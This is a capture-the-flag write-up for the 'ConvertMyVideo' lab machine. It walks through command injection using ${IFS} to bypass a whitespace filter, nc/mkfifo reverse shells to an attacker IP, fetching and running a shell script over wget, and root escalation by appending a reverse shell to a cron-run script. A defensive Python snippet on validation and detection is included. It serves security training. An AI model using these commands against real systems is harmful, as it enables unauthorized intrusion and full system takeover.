ConvertMyVideo - Medium THM

  • OS: Linux
  • Difficulty: Medium
  • Author: Talace

Scanning 🤖

threader3000.py

python3 threader3000.py

Port 22 is open
Port 80 is open

nmap scan

nmap -p22,80 -sV -sC -T4 -Pn -oA 10.10.232.225 10.10.232.225

22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))

Enumeration 👀

dirb scan

dirb http://10.10.232.225/ /usr/share/wordlists/dirb/common.txt

---- Scanning URL: http://10.10.232.225/ ----
+ http://10.10.232.225/admin (CODE:401|SIZE:460)

Command injection 💉

We land on the main page.

[Screenshot: main page]

I capture the request in Burp; it does not look very secure.

[Screenshot: captured request in Burp]

Let's try the 'id' command: it works!

[Screenshot: output of the id command]

I can't run 'ls -la'; it returns nothing. Maybe I can't use whitespace? I found that the variable IFS is a space by default, so let's try with it!

--version;ls${IFS}-la;

Nice, it works. From this I'm able to retrieve a lot of data, and the user flag at the same time.

[Screenshot: user flag]
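As an added defender-side example (not part of the original write-up), here is the kind of space-only filter the ${IFS} trick defeats, next to an allow-list validator and an argv builder that never hands the value to a shell, plus a small check for the injection markers in a decoded request; the converter binary name 'ffmpeg' and the parameter name 'video' are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed inputs: the value the form normally sends and the injected one
# from the write-up above (command separator plus ${IFS} in place of a space).
BENIGN = "--version"
INJECTED = "--version;ls${IFS}-la;"


def weak_filter_accepts(value: str) -> bool:
    """The kind of check the ${IFS} trick defeats: it rejects a literal space
    and nothing else, so ';', '$', '{', '}' and ${IFS} reach /bin/sh intact."""
    return " " not in value


# Hardened input rule: one short token of known-safe characters, nothing else.
SAFE_TOKEN = re.compile(r"[A-Za-z0-9._-]{1,64}")


def strict_validate(value: str) -> bool:
    """Allow-list check: fullmatch rejects shell metacharacters, whitespace and
    variable expansions instead of trying to enumerate bad characters."""
    return SAFE_TOKEN.fullmatch(value) is not None


def safe_argv(value: str) -> list[str]:
    """Argument vector for subprocess.run(argv) with shell=False. The binary
    name 'ffmpeg' is an assumption. The value stays a single argument, so no
    shell ever parses it; validation still runs first so the user cannot
    smuggle extra options to the binary."""
    if not strict_validate(value):
        raise ValueError(f"rejected parameter: {value!r}")
    return ["ffmpeg", value]


# Detection side: an IFS expansion or a command separator in a decoded query.
SUSPICIOUS = re.compile(r"\$\{?IFS\}?|[;|&`]")


def flag_request(raw_query: str) -> bool:
    """True when the URL-decoded query string carries injection markers; run it
    over the request parameters the converter receives (assumed name 'video')."""
    return SUSPICIOUS.search(unquote(raw_query)) is not None
```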

That's cool, but we need a way in, so let's put a reverse shell in it! Open my listener:

nc -nvlp 4444

And send my reverse shell!

rm${IFS}/tmp/f;mkfifo${IFS}/tmp/f;cat${IFS}/tmp/f|sh${IFS}-i${IFS}2>&1|nc${IFS}10.8.138.226${IFS}4444${IFS}>/tmp/f;

Oh crap!? It closes instantly; let's wget and run a script instead! 😦

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.8.138.226 4444 >/tmp/f" >> shell.sh

Open an HTTP server:

python3 -m http.server 80

And launch my new command: wget the script and run it with bash.

--version;wget${IFS}http://10.8.138.226/shell.sh;bash${IFS}shell.sh;

Yessir! We are in!😼

Privilege escalation 🐧

Upgrade the shell

python -c 'import pty; pty.spawn("/bin/bash")'

Let's run pspy; first check which build is needed:

uname -a

Output: Linux dmv 4.15.0-96-generic #97-Ubuntu SMP Wed Apr 1 03:25:46 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

I need the 64-bit build; wget it and change the permissions:

wget http://10.8.138.226:81/pspy64 && chmod +xs pspy64

Now launch pspy:

./pspy64

Oh, interesting cron job!

2023/11/11 18:13:01 CMD: UID=0     PID=27982  | bash /var/www/html/tmp/clean.sh

Let's launch a reverse shell from it.

Open a netcat listener:

nc -nvlp 4445

Now put the reverse shell in it:

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.8.138.226 4445 >/tmp/f" >> clean.sh

Go back to your netcat listener... Boom! Got root, GG!

[Screenshot: root shell]

Resources

How to run a command without white space: Article

This post is licensed under CC BY 4.0 by the author.